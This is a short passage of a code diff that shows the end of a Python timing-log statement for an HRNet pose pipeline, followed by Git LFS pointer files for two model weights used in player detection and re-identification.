+            # f"team crops={t_team_crops:.1f}ms infer={t_team_infer:.1f}ms | "
+            f"HRNet pre={t_hrnet_preprocess:.1f}ms infer={t_hrnet_infer:.1f}ms decode={t_hrnet_decode:.1f}ms post={t_hrnet_post:.1f}ms total={t_hrnet_total:.1f}ms | "
+            f"combine={t_combine:.1f}ms | total={t_total:.1f}ms (n_frames={len(batch_images)})"
+        )
+        return results

osnet_model.pth.tar-100 ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:45e1de9d329b534c16f450d99a898c516f8b237dcea471053242c2d4c76b4ace
+size 26846063

player_detect.pt ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:934be460f78c594cc98078027f280c23385c9897e3e761e438559b3193233b46
+size 19209626